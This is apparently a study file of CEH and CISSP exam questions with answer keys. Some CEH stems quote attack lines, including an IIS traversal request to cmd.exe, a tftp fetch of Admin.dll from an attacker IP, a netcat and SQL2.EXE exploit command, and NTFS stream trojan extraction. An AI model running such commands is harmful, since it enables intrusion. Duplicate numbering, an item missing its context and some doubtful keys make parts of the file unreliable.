C#CEH Q.58 From the following spam mail header, identify the host IP that sent this spam?^  Note: This question includes an HTML table which may not be accurately rendered^  From jie02@netvigator.com Tue Nov 27 17:27:11 2001^  Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)^  Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)^  Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk^  From: "china hotel web"^  To: "Shlam"^  Subject: SHANGHAI (HILTON HOTEL) PACKAGE^  Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0^  X-Priority: 3 X-MSMail-^  Priority: Normal^  Reply-To: "china hotel web"^	(Select the Best Answer)^A.	137.189.96.52^B.	203.218.39.50^C.	203.218.39.20^D.	8.12.1.0
A#CEH Q.59 An httpd access_log file shows a WEB-IIS attack from a remote host^  04:47:14 137.68.238.15 GET /scripts/..%5c../winnt/system32/cmd.exe 404^  Which of the following will provide the organization (in full name) that owns the whole IP block of the remote host (i.e. 137.68.0.0 - 137.68.255.255)? (Select the Best Answer)^A.	#whois 137.68.238.15@whois.arin.net^B.	#arin 137.68.238.15^C.	#tucows -t 137.68.238.15^D.	#dlookup 137.68.238.15@name -l
D#CEH Q.60 Buffer overflow exploit can change the execution flow of a program because: (Select all that apply)^A.	it injects shell code in the stack^B.	it stuffs many 90 NOP code to the stack^C.	it stuffs too many data into local function variables^D.	it overwrites the return address of a call function in the stack
B,C,D#CEH Q.61 Which of the following techniques are used for insertion attack on IDS? (Select all that apply)^A.	Using IP Fragmentation^B.	Using Invalid sequence no.^C.	Using incorrect TCP checksum^D.	Using short TTL^E.	Using non-existent SYN packet flood
A#CEH Q.62 The following are tcpdump packets of an ARP poisoning Man-in-the-Middle (MITM) attack.^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  What is the MAC address of the middleman? (Select the Best Answer)^A.	0:50:56:47:0:61^B.	0:50:56:47:0:65^C.	0:50:56:47:0:46
C#CEH Q.63 John's department Web site has been hacked. He reviews the Web site logs and discovers the following log entries:^  34.5.67.4 is the IP address of the attacker:^  GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/ c+tftp%20-i%34.5.67.4%20GET%20Admin.dll%20c:\Admin.dll^  Which of the following worms is responsible for this attack? (Select the Best Answer)^A.	Melissa^B.	SQL Slammer^C.	Nimda^D.	Code Red
C#CEH Q.64 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. ^  Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. ^  Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password ''just to double check our records.'' Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe.^  This is an example of what attack? (Select the Best Answer)^A.	Reverse Psychology^B.	Reverse Engineering^C.	Social Engineering^D.	Spoofing Identity^E.	Faking Identity
A#CEH Q.65 On October 7, 2001, NASA suffered massive attacks. Files were taken and employees' directories were invaded. ^  The intruders left methods to regain access to the system, called ''back doors,'' to allow them to reenter at any point in the future. ^  The attackers used a malicious program that disguises itself as a Word document and uses a flaw in the Word program for its attack. ^  Once the file is opened, it can steal log files and passwords. These are then sent back to the originator of the attack. ^  What worm was used for this attack? (Select the Best Answer)^A.	Melissa^B.	Pretty Park^C.	Goga^D.	W32:Klez
B#CEH Q.66 Which of the following correctly describes the IDS evasion tool fragrouter? (Select the Best Answer)^A.	Some IDS can only keep track of one host/port connection at a time. Flood the target port with non-existent SYN packet first so that these IDS ignore the real connection.^B.	IP Fragmentation. By sending out fragment packets out of order, some IDS assume the fragment packets arrive in order. They just reassemble the data as soon as the marked final fragment arrives. Sending out fragment packets out of order may fool the IDS.^C.	Sending overlapping fragment packets. There may be a gap between the IDS and end-point server handling overlapping fragment. If the IDS does not handle overlapping fragments in a manner consistent with the systems it watches, it may reassemble a completely different packet than an end system in receipt of the same fragments.^D.	An end-system can accept a packet that an IDS rejects. An IDS that mistakenly rejects such a packet misses its contents entirely.
B#CEH Q.67 What is the hacking tool WinSSLMiM used for? (Select the Best Answer)^A.	Kills SSL TCP Sessions.^B.	Used in Man-in-the-Middle attacks against SSL Connections.^C.	Generates fake SSL Certificates.^D.	Monitors Windows SSL Sessions.
A,B,C#CEH Q.68  The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. ^  The SQL Server Resolution Service operates on UDP port 1434, provides a way for clients to query the appropriate network endpoints to use for a particular SQL Server instance. By sending a carefully crafted packet to the Resolution Service, an attacker could compromise and take over the system. ^  The hacking tool SQL2.EXE is used to launch this attack.^  C:\>nc -l -p 53^  C:\>SQL2.EXE db.target.com 202.202.202.202 53^  Which Microsoft SQL Server 2000 service packs are vulnerable to this exploit? (Select all that apply)^A.	SP0^B.	SP1^C.	SP2^D.	SP3
C#CEH Q.69 Which of the following is a backdoor Dynamic Link Library (DLL) Trojan that is used to attack and exploit IIS servers? If the attack is successful, then the attacker will have gained System level access to the server. ^  The Trojan DLL needs to be installed in the 'Scripts' directory of the IIS 5.0 machine in order for the exploit to be used. Browsing to the DLL (eg. http://IIS-server/enables the Hacker to spawn commands remotely (using CMD.EXE). (Select the Best Answer)^A.	IISExploit^B.	Jill-32.dll^C.	IISCrack.dll^D.	IPPExploit.dll
B#CEH Q.70 Which of the following Windows Hacking tools is used to hijack Telnet and FTP sessions? (Select the Best Answer)^A.	Hunt^B.	Juggernaut^C.	TTYWatcher^D.	T-Sight
C#CEH Q.71 Take a look at the following code:^  c:\> wtk -p 80 -i 192.168.0.1^  What does the hacking tool WTK do? (Select the Best Answer)^A.	It is a TCP connection killer for Windows 2000.^B.	It is a Windows Trojan Kit (wtk) program that connects to the daemon at 192.168.0.1 using port 80.^C.	It is a Windows Tunneling Kit (wtk) that establishes covert channels to 192.168.0.1 using port 80.^D.	This is a Linux command, which lists services and threads running on 192.168.0.1 at port 80.
c#CEH Q.74 What is the IP address of _rootkit_'s embedded TCP/IP stack? (Select the Best Answer)^A.	192.168.0.78^B.	172.8.0.1^C.	10.0.0.166^D.	204.187.7.99
C#CEH Q.75 You have successfully compromised MommaCookie's computer at MommaCookie.com domain. You have escalated your privileges to the level of an Administrator and planted a virus. You would like to cover your tracks by selectively erasing operating system log entries. Which tool will you use? (Select the Best Answer)^A.	Auditpol.exe^B.	Elslave.exe^C.	WinZapper^D.	Evidence Eliminator
D#CEH Q.76 Which of the following is a steganographic program that is used to conceal messages in ASCII text by appending whitespace to the end of lines in a text file? (Select the Best Answer)^A.	Camera/Shy^B.	ImageHide^C.	WhiteSpacer^D.	Snow
B#CEH Q.77 What is a Restorator? (Select the Best Answer)^A.	Restorator is a hacking tool which records keystrokes on a victim's computer.^B.	Restorator is a hacking tool which allows you to modify the user interface of any Win32 program by creating your own UCA's.^C.	Restorator is an advanced EXE wrapper for Windows 2K, which is used for SFX-archiving and secretly installing and running programs.^D.	It is a BackOrifice plug-in tool which extends BO2K functionality.
D#CEH Q.78 Which of the following is an ARP spoofing tool that is part of dsniff? (Select the Best Answer)^A.	Webspy^B.	URLSnarf^C.	Arpsniff^D.	Macof
B#CEH Q.79 Which of the following is a MAC address modifying utility which allows users to change MAC address for almost any Network Interface Cards (NIC) on the Windows 2000 and XP systems? (Select the Best Answer)^A.	Macof^B.	Smac^C.	Mac Changer^D.	Arpper
B#CEH Q.80 Take a look at the following code:^  c:\>wds_nwww.mikegolds.com_I4.6.7.8_g00-00-39-5c-45-3b^  What does the hacking tool wds do? (Select the Best Answer)^A.	It retrieves DNS records from ARIN database for the domain www.mikegolds.com^B.	It spoofs DNS domain name www.mikegolds.com to the IP address 4.6.7.8^C.	It poisons the MAC address located at 4.6.7.8 with 00-00-39-5c-45-3b^D.	It hijacks TCP sessions originating from www.mikegolds.com to the attackers machine located at 4.6.7.8
C#CEH Q.81 Which of the following is a Linux based sniffer detection tool? (Select the Best Answer)^A.	WinSniffer^B.	SniffDet^C.	Ethereal^D.	Ettercap
D#CEH Q.82 You launch Nmap targeting the domain http://www.furnituremill.com.^  Port 		State 		Service^  21/tcp 		open 		ftp^  80/tcp 		open 		http^  135/tcp 		open 		loc-srv^  139/tcp 		open 		netbios-ssn^  443/tcp 		open 		https^  1031/tcp 	open 		iads^  From the above output, you notice that port 139 is open. What hacking tool will you use to download list of shares and usernames from the domain http://www.furnituremill.com assuming you can connect through null sessions? (Select the Best Answer)^A.	SMBRelay^B.	SMBDump^C.	User2Sid^D.	DumpSec
B#CEH Q.84 Which of the following tools will you use to bypass a firewall that blocks all ports except ICMP? (Select all that apply)^A.	HTTP Reverse Shell^B.	Loki^C.	HTTP Tunnel^D.	007Shell
B#CEH Q.85 How long will it take to crack RSA 40 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
C#CEH Q.86 How long will it take to crack RSA 56 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
E#CEH Q.87 How long will it take to crack RSA 128 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
A,B,D,E#CEH Q.86  Buffer Overflow Vulnerabilities are due to applications that do not perform bound checks in the code. Which of the following C/C++ functions do not perform bound checks? (Select all that apply)^A.	gets()^B.	memcpy()^C.	strcpr()^D.	scanf()^E.	strcat()
D#CEH Q.88 How long will it take to crack RSA 64 bits key using a single Pentium 4 2.4 GHZ computer using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years
C#CEH Q.89 You have hidden a Trojan file virus.exe inside an abc.txt file using NTFS streaming. Which command would you execute to extract the Trojan to a standalone file? (Select the Best Answer)^A.	c:\> type abc.txt:virus.exe > virus.exe^B.	c:\> more abc.txt|virus.exe > virus.exe^C.	c:\> cat abc.txt:virus.exe > virus.exe^D.	c:\> list abc.txt$virus.exe > virus.exe
D#CISSP1 Q.1: In a discretionary mode, which of the following entities is authorized to grant information access to other people?	^A: Manager	^B: Group leader	^C: Security manager	^D: User
C#CISSP1 Q.2: Which DES mode of operation is best suited for database encryption?	^A: Cipher Block Chaining (CBC) mode	^B: Cycling Redundancy Checking (CRC) mode	^C: Electronic Code Book (ECB) mode	^D: Cipher Feedback (CFB) mode
B#CISSP1 Q.3: Within the realm of IT security, which of the following combinations best defines risk?	^A: Threat coupled with a breach.	^B: Threat coupled with a vulnerability.	^C: Vulnerability coupled with an attack.	^D: Threat coupled with a breach of security.
B#CISSP1 Q.4: Which of the following would be the best reason for separating the test and development environments?	^A: To restrict access to systems under test.	^B: To control the stability of the test environment.	^C: To segregate user and development staff.	^D: To secure access to systems under development.
A#CISSP1 Q.5: Which of the following statements pertaining to dealing with the media after a disaster occurred and disturbed the organization's activities is incorrect?	^A: The CEO should always be the spokesperson for the company during a disaster.	^B: The disaster recovery plan must include how the media is to be handled during the disaster.	^C: The organization's spokesperson should report bad news before the press gets a hold of it through another channel.	^D: An emergency press conference site should be planned ahead.
B#CISSP1 Q.6: Which Orange book security rating introduces security labels?	^A: C2	^B: B1	^C: B2	^D: B3
A#CISSP1 Q.7: A Business Impact Analysis (BIA) does not:	^A: Recommend the appropriate recovery solution.	^B: Determine critical and necessary business functions and their resource dependencies.	^C: Identify critical computer applications and the associated outage tolerance.	^D: Estimate the financial impact of a disruption.
A#CISSP1 Q.8: Which access control model enables the owner of the resource to specify what subjects can access specific resources?	^A: Discretionary Access Control	^B: Mandatory Access Control	^C: Sensitive Access Control	^D: Role-based Access Control
C#CISSP1 Q.9: What type of cable is used with 100Base-TX Fast Ethernet?	^A: Fiber-optic cable	^B: Four pairs of Category 3, 4 or 5 unshielded twisted-pair (UTP) wires.	^C: Two pairs of Category 5 unshielded twisted-pair (UTP) or Category 1 shielded twisted-pair (STP) wires.	^D: RG.58 cable.
B#CISSP1 Q.10: Which of the following best describes the Secure Electronic Transaction (SET) protocol?	^A: Originated by VISA and MasterCard as an Internet credit card protocol.	^B: Originated by VISA and MasterCard as an Internet credit card protocol using digital signatures.	^C: Originated by VISA and MasterCard as an Internet credit card protocol using the transport layer.	^D: Originated by VISA and MasterCard as an Internet credit card protocol using SSL.
D#CISSP1 Q.11: At which of the following phases of a software development life cycle are security and access controls	^A: Coding	^B: Product design	^C: Software plans and requirements	^D: Detailed design
C#CISSP1 Q.12: Which type of control would password management classify as?	^A: Compensating control	^B: Detective control	^C: Preventive control	^D: Technical control
C#CISSP1 Q.13: Due care is not related to:	^A: Good faith	^B: Prudent man	^C: Profit	^D: Best interest
D#CISSP1 Q.14: Which of the following is not an Orange Book-defined life cycle assurance requirement?	^A: Security testing	^B: Design specification and testing	^C: Trusted distribution	^D: System integrity
A#CISSP1 Q.15: What is another name for the Orange Book?	^A: The Trusted Computer System Evaluation Criteria (TCSEC)	^B: The Trusted Computing Base (TCB)	^C: The Information Technology Security Evaluation Criteria (ITSEC)	^D: The Common Criteria
C#CISSP1 Q.16: A password that is the same for each log-on session is called a?	^A: one-time password	^B: two-time password	^C: static password	^D: dynamic password
C#CISSP1 Q.17: Which of the following backup methods is most appropriate for off-site archiving?	^A: Incremental backup method.	^B: Off-site backup method.	^C: Full backup method.	^D: Differential backup method.
C#CISSP1 Q.18: Which of the following is not a weakness of symmetric cryptography?	^A: Limited security	^B: Key distribution	^C: Speed	^D: Scalability
B#CISSP1 Q.19: Which of the following is not a defined layer in the TCP/IP protocol model?	^A: Application layer	^B: Session layer	^C: Internet layer	^D: Network access layer
A#CISSP1 Q.20: Rewritable and erasable (CDR/W) optical disks are sometimes used for backups that require short time storage for changeable data, but require?	^A: Faster file access than tape.	^B: Slower file access than tape.	^C: Slower file access than drive.	^D: Slower file access than scale.
B#CISSP1 Q.21: Which one of the following is not a primary component or aspect of firewall systems?	^A: Protocol filtering	^B: Packet switching	^C: Rule enforcement engine	^D: Extended logging capability
C#CISSP1 Q.22: What are database views used for?	^A: To ensure referential integrity.	^B: To allow easier access to data in a database.	^C: To restrict user access to data in a database.	^D: To provide audit trails.
B#CISSP1 Q.23: Which of the following Common Data Network Services is used to send and receive email internally or externally through an email gateway device?	^A: File services	^B: Mail services	^C: Print services	^D: Client/Server services
D#CISSP1 Q.24: Intrusion detection has which of the following sets of characteristics.	^A: It is adaptive rather than preventive.	^B: It is administrative rather than preventive.	^C: It is disruptive rather than preventative.	^D: It is detective rather than preventative.
A#CISSP1 Q.25: Which type of password provides maximum security because a new password is required for each new log-on is defined as?	^A: One-time or dynamic password	^B: Cognitive password	^C: Static password	^D: Pass phrase
B#CISSP1 Q.26: They are in the form of credit card-size memory cards or smart cards, or resemble small calculators, and are used to supply static and dynamic passwords. They are called?	^A: Token Ring	^B: Tokens	^C: Token passing networks	^D: Coupons
A#CISSP1 Q.27: Which of the following uses a directed graph to specify the rights that a subject can transfer to an object, or that a subject can take from another subject?	^A: Take-Grant model	^B: Access Matrix model	^C: Biba model	^D: Bell-Lapadula model
D#CISSP1 Q.28: Which of the following is the BEST way to prevent software license violations?	^A: Implementing a corporate policy on copyright infringements and software use.	^B: Requiring that all PCs be diskless workstations.	^C: Installing metering software on the LAN so applications can be accessed through the metered software.	^D: Regularly scanning used PCs to ensure that unauthorized copies of software have not been loaded on the PC.
A#CISSP1 Q.29: Zip/Jaz drives, SyQuest, and Bernoulli boxes are very transportable and are often the standard for?	^A: Data exchange in many businesses.	^B: Data change in many businesses.	^C: Data compression in many businesses.	^D: Data interchange in many businesses.
D#CISSP1 Q.30: What are two types of system assurance?	^A: Operational Assurance and Architecture Assurance.	^B: Design Assurance and Implementation Assurance.	^C: Architecture Assurance and Implementation Assurance.	^D: Operational Assurance and Life-Cycle Assurance.
A#CISSP1 Q.31: Why does compiled code pose more risk than interpreted code? ^A: Because malicious code can be embedded in the compiled code and can be difficult to detect.	^B: Because the browser can safely execute all interpreted applets.	^C: Because compilers are not reliable.	^D: It does not. Interpreted code poses more risk than compiled code.
C#CISSP1 Q.32: Which model, based on the premise that the quality of a software product is a direct function of the quality of its associated software development and maintenance processes, introduced five levels with which the maturity of an organization involved in the software process is evaluated? 	^A: The Total Quality Model (TQM)	^B: The IDEAL Model	^C: The Software Capability Maturity Model	^D: The Spiral Model
A#CISSP1 Q.33: Phreakers are hackers who specialize in telephone fraud. What type of telephone fraud simulates the tones of coins being deposited into a payphone? 	^A: Red Boxes	^B: Blue Boxes	^C: White Boxes	^D: Black Boxes
C#CISSP1 Q.34: What is the proper term to refer to a single unit of Ethernet data? 	^A: Ethernet segment	^B: Ethernet datagram	^C: Ethernet frame	^D: Ethernet packet	
A#CISSP1 Q.35: Which of the following represents an ALE calculation? 	^A: Single loss expectancy x annualized rate of occurrence.	^B: Gross loss expectancy x loss frequency.	^C: Actual replacement cost - proceeds of salvage.	^D: Asset value x loss expectancy.
A#CISSP1 Q.36: If an operating system permits executable objects to be used simultaneously by multiple users without a refresh of the objects, what security problem is most likely to exist? 	^A: Disclosure of residual data.	^B: Unauthorized obtaining of a privileged execution state.	^C: Data leakage through covert channels.	^D: Denial of service through a deadly embrace.
A#CISSP1 Q.37: Tape arrays use a large device with multiple (sometimes 32 or 64) tapes that are configured as a? 	^A: Single array	^B: Dual array	^C: Triple array	^D: Quadruple array
D#CISSP1 Q.38: Why would anomaly detection IDSs often generate a large number of false positives? 	^A: Because they can only identify correctly attacks they already know about.	^B: Because they are application-based and are more subject to attacks.	^C: Because they can't identify abnormal behavior.	^D: Because normal patterns of user and system behavior can vary wildly.
C#CISSP1 Q.39: According to private sector data classification levels, how would salary levels and medical information be classified? 	^A: Public	^B: Sensitive	^C: Private	^D: Confidential
B#CISSP1 Q.40: Which of the following is used in database information security to hide information? 	^A: Inheritance	^B: Polyinstantiation	^C: Polymorphism	^D: Delegation
A#CISSP1 Q.41: Which of the following evaluates the product against the specification? 	^A: Verification	^B: Validation	^C: Concurrence	^D: Accuracy
D#CISSP1 Q.42: Application Level Firewalls are commonly a host computer running proxy server software, which makes a? 	^A: Proxy Client	^B: Proxy Session	^C: Proxy System	^D: Proxy Server
B#CISSP1 Q.43: What attack involves the perpetrator sending spoofed packet(s) with the SYN flag set to the victim's machine on any open port that is listening? 	^A: Bonk attack	^B: Land attack	^C: Teardrop attack	^D: Smurf attack
A#CISSP1 Q.44: The beginning and the end of each transfer during asynchronous communication data transfer are marked by? 	^A: Start and Stop bits.	^B: Start and End bits.	^C: Begin and Stop bits.	^D: Start and Finish bits.
A#CISSP1 Q.45: Most of unplanned downtime of information systems is attributed to which of the following? 	^A: Hardware failure	^B: Natural disaster	^C: Human error	^D: Software failure
A#CISSP1 Q.46: RAID that functions as part of the operating system on the file server 	^A: Software implementation	^B: Hardware implementation	^C: Network implementation	^D: Netware implementation
C#CISSP1 Q.47: During which phase of an IT system life cycle are security requirements developed? 	^A: Operation	^B: Initiation	^C: Development	^D: Implementation
B#CISSP1 Q.48: Ensuring that printed reports reach proper users and that receipts are signed before releasing sensitive documents are examples of? 	^A: Deterrent controls	^B: Output controls	^C: Information flow controls	^D: Asset controls
B#CISSP1 Q.49: Non-Discretionary Access Control. A central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on? 	^A: The society's role in the organization.	^B: The individual's role in the organization.	^C: The group-dynamics as they relate to the individual's role in the organization.	^D: The group-dynamics as they relate to the master-slave role in the organization.
B#CISSP1 Q.50: An effective information security policy should not have which of the following characteristics? 	^A: Include separation of duties.	^B: Be designed with a short- to mid-term focus.	^C: Be understandable and supported by all stakeholders.	^D: Specify areas of responsibility and authority.
B#CISSP1 Q.51: Which of the following statements pertaining to secure information processing facilities is incorrect? 	^A: Walls should have an acceptable fire rating.	^B: Windows should be protected by bars.	^C: Doors must resist forcible entry.	^D: Location and type of fire suppression systems should be known.
D#CISSP1 Q.52: Making sure that the data is accessible when and where it is needed is which of the following? 	^A: Confidentiality	^B: Integrity	^C: Acceptability	^D: Availability
B#CISSP1 Q.53: Business continuity plan development depends most on? 	^A: Directives of Senior Management	^B: Business Impact Analysis (BIA)	^C: Scope and Plan Initiation	^D: Skills of BCP committee
D#CISSP1 Q.54: Which layer defines the X.25, V.35, X.21 and HSSI standard interfaces?	^A: Transport layer	^B: Network layer	^C: Data link layer	^D: Physical layer
D#CISSP1 Q.55: Related to information security, availability is the opposite of which of the following? 	^A: Delegation	^B: Distribution	^C: Documentation	^D: Destruction
A#CISSP1 Q.56: Which of the following is a disadvantage of a behavior-based ID system? 	^A: The activity and behavior of the users while in the networked system may not be static enough to effectively implement a behavior-based ID system.	^B: The activity and behavior of the users while in the networked system may be dynamic enough to effectively implement a behavior-based ID system.	^C: The activity and behavior of the users while in the networked system may not be dynamic enough to effectively implement a behavior-based ID system.	^D: The system is characterized by high false negative rates where intrusions are missed.
C#CISSP1 Q.57: Which of the following statements pertaining to VPN protocol standards is false? 	^A: L2TP is a combination of PPTP and L2F.	^B: L2TP and PPTP were designed for single point-to-point client to server communication.	^C: L2TP operates at the network layer.	^D: PPTP uses native PPP authentication and encryption services.
C#CISSP1 Q.58: What is the most critical characteristic of a biometric identifying system? 	^A: Perceived intrusiveness	^B: Storage requirements	^C: Accuracy	^D: Reliability
A#CISSP1 Q.59: RAID Software can run faster in the operating system because neither use the hardware-level parity drives by? 	^A: Simple striping or mirroring.	^B: Hard striping or mirroring.	^C: Simple hamming code parity or mirroring.	^D: Simple striping or hamming code parity.
A#CISSP1 Q.60: The guarantee that the message sent is the message received, and that the message was not intentionally or unintentionally altered is? 	^A: Integrity	^B: Confidentiality	^C: Availability	^D: Identity
B#CISSP1 Q.61: Which of the following is a preventive control? 	^A: Motion detectors	^B: Guard dogs	^C: Audit logs	^D: Intrusion detection systems
B#CISSP1 Q.62: What uses a key of the same length as the message? 	^A: Running key cipher	^B: One-time pad	^C: Steganography	^D: Cipher block chaining
A#CISSP1 Q.63: Which of the following protocols operates at the session layer (layer 5)? 	^A: RPC	^B: IGMP	^C: LDP	^D: SPX
B#CISSP1 Q.64: Which of the following is NOT a countermeasure to traffic analysis? 	^A: Padding messages	^B: Eavesdropping	^C: Sending noise	^D: Covert channel analysis
C#CISSP1 Q.65: Which of the following layers of the ISO/OSI model do packet filtering firewalls operate at?	^A: Application layer	^B: Session layer	^C: Network layer	^D: Presentation layer
C#CISSP1 Q.66: A prolonged high voltage is? 	^A: Spike	^B: Blackout	^C: Surge	^D: Fault
D#CISSP1 Q.67: How do the Information Labels of Compartmented Mode Workstation differ from the Sensitivity Levels of B3 evaluated systems? 	^A: Information Labels in CMW are homologous to Sensitivity Labels, but a different term was chosen to emphasize that CMW's are not described in the Orange Book.	^B: Information Labels contain more information than Sensitivity Labels, thus allowing more granular access decisions to be made.	^C: Sensitivity Labels contain more information than Information Labels because B3+ systems should store more sensitive data than workstations.	^D: Information Labels contain more information than Sensitivity Labels, but are not used by the Reference Monitor to determine access permissions.
A#CISSP1 Q.68: In what security mode can a system be operating if all users have the clearance or authorization and need-to-know to all data processed within the system? 	^A: Dedicated security mode.	^B: System-high security mode.	^C: Compartmented security mode.	^D: Multilevel security mode.
D#CISSP1 Q.69: What are the three conditions that must be met by the reference monitor?	^A: Confidentiality, availability and integrity.	^B: Policy, mechanism and assurance.	^C: Isolation, layering and abstraction.	^D: Isolation, completeness and verifiability.
B#CISSP1 Q.70: While referring to Physical Security, what does Positive pressurization mean? 	^A: The pressure inside your sprinkler system is greater than zero.	^B: The air goes out of a room when a door is opened and outside air does not go into the room.	^C: Causes the sprinkler system to go off.	^D: A series of measures that increase pressure on employees in order to make them more productive.
C#CISSP1 Q.71: The baseline sets certain thresholds for specific errors or mistakes allowed and the amount of these occurrences that can take place before it is considered suspicious? 	^A: Checkpoint level	^B: Ceiling level	^C: Clipping level	^D: Threshold level
B#CISSP1 Q.72: The most prevalent cause of computer center fires is which of the following? 	^A: AC equipment	^B: Electrical distribution systems.	^C: Heating systems	^D: Natural causes
C#CISSP1 Q.73: An offsite backup facility intended to operate an information processing facility, having no computer or communications equipment, but having flooring, electrical wiring, air conditioning, etc., is better known as a? 	^A: Hot site	^B: Duplicate processing facility	^C: Cold site	^D: Warm site
C#CISSP1 Q.74: Which of the following are necessary components of a Multi-Level Security Policy? 	^A: Sensitivity Labels and a "system high" evaluation.	^B: Sensitivity Labels and Discretionary Access Control.	^C: Sensitivity Labels and Mandatory Access Control.	^D: Object Labels and a "system high" evaluation.
A#CISSP1 Q.75: Which of the following, used to extend a network, has a storage capacity to store frames and act as a store-and-forward device? 	^A: Bridge	^B: Router	^C: Repeater	^D: Gateway
D#CISSP1 Q.76: Which of the following is addressed by Kerberos? 	^A: Confidentiality and integrity.	^B: Authorization and authentication.	^C: Validation and integrity.	^D: Confidentiality and integrity.
A#CISSP1 Q.77: Access Control techniques do not include which of the following choices? 	^A: Relevant Access Controls	^B: Discretionary Access Control	^C: Mandatory Access Control	^D: Lattice Based Access Control
D#CISSP1 Q.78: Why is public key cryptography recommended for use in the process of securing facsimiles during transmission? 	^A: Keys are never transmitted over the network.	^B: Data compression decreases key change frequency.	^C: Key data is not recognizable from facsimile data.	^D: The key is securely passed to the receiving machine.
A#CISSP1 Q.79: Database views are not used to:	^A: Implement referential integrity.	^B: Implement least privilege.	^C: To implement content-dependent access restrictions.	^D: Implement need-to-know.
B#CISSP1 Q.80: Which of the following is most concerned with personnel security? 	^A: Management controls	^B: Operational controls	^C: Technical controls	^D: Human resources controls.
A#CISSP1 Q.81: Which of the following statements pertaining to the Trusted Computer System Evaluation Criteria (TCSEC) is incorrect? 	^A: With TCSEC, functionality and assurance are evaluated separately.	^B: TCSEC provides a means to evaluate the trustworthiness of an information system.	^C: The Orange book does not cover networks and communications.	^D: Data base management systems are not covered by the TCSEC.
B#CISSP1 Q.82: Which of the following could illegally capture network user passwords? 	^A: Data diddling	^B: Sniffing	^C: Spoofing	^D: Smurfing
A#CISSP1 Q.83: Which trusted facility management concept implies that two operators must review and approve the work of each other? 	^A: Two-man control	^B: Dual control	^C: Double control	^D: Segregation control
B#CISSP1 Q.84: There are more than 20 books in the Rainbow Series. Which of the following covers password management guidelines? 	^A: Orange Book	^B: Green Book	^C: Red Book	^D: Lavender Book
D#CISSP1 Q.85: Which of the following is an IP address that is private (i.e. reserved for internal networks, and not a valid address to use on the Internet)? 	^A: 172.5.42.5	^B: 172.76.42.5	^C: 172.90.42.5	^D: 172.16.42.5
C#CISSP1 Q.86: How fast is private key cryptography compared to public key cryptography? 	^A: 10 to 100 times faster.	^B: 100 to 1000 times faster.	^C: 1000 to 10000 times faster.	^D: 10000 to 20000 times faster.
C#CISSP1 Q.87: The continual effort of making sure that the correct policies, procedures and standards are in place and being followed is described as what? 	^A: Due care	^B: Due concern	^C: Due diligence	^D: Due practice
A#CISSP1 Q.88: Which tape format type is mostly used for home/small office backups? 	^A: Quarter Inch Cartridge drives (QIC)	^B: Digital Linear Tapes (DLT)	^C: 8mm tape	^D: Digital Audio Tape (DAT)
C#CISSP1 Q.89: In an organization, an Information Technology security function should: 	^A: Be a function within the information systems function of an organization.	^B: Report directly to a specialized business unit such as legal, corporate security or insurance.	^C: Be led by a Chief Security Officer and report directly to the CEO.	^D: Be independent but report to the Information Systems function.
C#CISSP1 Q.90: Who of the following is responsible for ensuring that proper controls are in place to address integrity, confidentiality, and availability of IT systems and data? 	^A: Business and functional managers.	^B: IT Security practitioners.	^C: System and information owners.	^D: Chief information officer.
A#CISSP1 Q.91: The act of requiring two of the three factors to be used in the authentication process refers to? 	^A: Two-Factor Authentication	^B: One-Factor Authentication	^C: Bi-Factor Authentication	^D: Double Authentication
A#CISSP1 Q.92: This type of backup management provides a continuous on-line backup by using optical or tape jukeboxes, similar to WORMs, (Write Once, Read Many) 	^A: Hierarchical Storage Management (HSM).	^B: Hierarchical Resource Management (HRM).	^C: Hierarchical Access Management (HAM).	^D: Hierarchical Instance Management (HIM).
D#CISSP1 Q.93: Which of the following elements is not included in a Public Key Infrastructure (PKI)? 	^A: Timestamping	^B: Lightweight Directory Access Protocol (LDAP)	^C: Certificate revocation	^D: Internet Key Exchange (IKE)
B#CISSP1 Q.94: Which of the following best corresponds to the type of memory addressing where the address location that is specified in the program instruction contains the address of the final desired location? 	^A: Direct addressing	^B: Indirect addressing	^C: Indexed addressing	^D: Program addressing
B#CISSP1 Q.95: Creation and maintenance of intrusion detection systems and processes for the following is one of them identify it: 	^A: Event nonrepudiation	^B: Event notification	^C: Netware monitoring	^D: Guest access
